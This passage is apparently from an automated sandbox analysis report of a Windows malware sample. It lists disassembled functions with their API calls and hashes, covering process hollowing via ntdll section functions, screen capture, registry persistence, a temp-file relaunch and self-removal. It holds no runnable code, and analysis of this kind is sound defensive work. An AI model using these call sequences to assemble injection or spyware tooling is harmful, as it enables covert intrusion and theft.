                                                                                                                                                                                              • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                                                                                                                                                              Function 004512FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                              • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                              • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                                                                                                                                                              • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                                                                                                                                                              Function 00450DED Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(004510CA,00000001), ref: 00450E39
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                              • Opcode ID: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
                                                                                                                                                                                              • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                                                                                                                                                              Function 0041A7B2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                              • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                                                                                                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                                                                              • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                                                                              Function 004470BE Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(Function_00047078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                              • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                                                                                              • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                                                                                                                                                              • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                                                                                                                                                              • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                                                                                                                                                              Function 00450D07 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450C5E,00000001), ref: 00450D3E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                              • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                                                                                              • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                                                                                              • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                                                                                                                                                              Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                              • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                                                                                                              • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                                                                                              Function 00426107 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                              • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                              • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                                                                                              Function 00433CE7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                              • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                                                                                              • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                              Function 0044E93E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                              • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                                                                                              • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                                                                                                              • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                                                                                                              Function 00417FAF Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                                                                                                                                                                • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041806D
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418070
                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                                                                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                                                                                                                                                              • GetIconInfo.USER32(?,?), ref: 004180DB
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0041810A
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00418117
                                                                                                                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                                                                                                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041828F
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418292
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418295
                                                                                                                                                                                              • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418354
                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0041835B
                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041836B
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418376
                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 004183A8
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                                              • API String ID: 1765752176-865373369
                                                                                                                                                                                              • Opcode ID: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                                                                                                                                                              • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                                                                                                                                                              • Opcode Fuzzy Hash: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                                                                                                                                                              • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                                                                                                                                                              Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                              • API String ID: 4188446516-3035715614
                                                                                                                                                                                              • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                              • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                              • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                                                                                                                                                                                              Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                                                • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
                                                                                                                                                                                                • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
                                                                                                                                                                                                • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                                • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                                                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                                                              • API String ID: 4250697656-2665858469
                                                                                                                                                                                              • Opcode ID: a8fea185397083a77c328c300189fb8836f68a2773d02d272e4e2518edd72712
                                                                                                                                                                                              • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                                                                                                                                                              • Opcode Fuzzy Hash: a8fea185397083a77c328c300189fb8836f68a2773d02d272e4e2518edd72712
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                                                                              Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
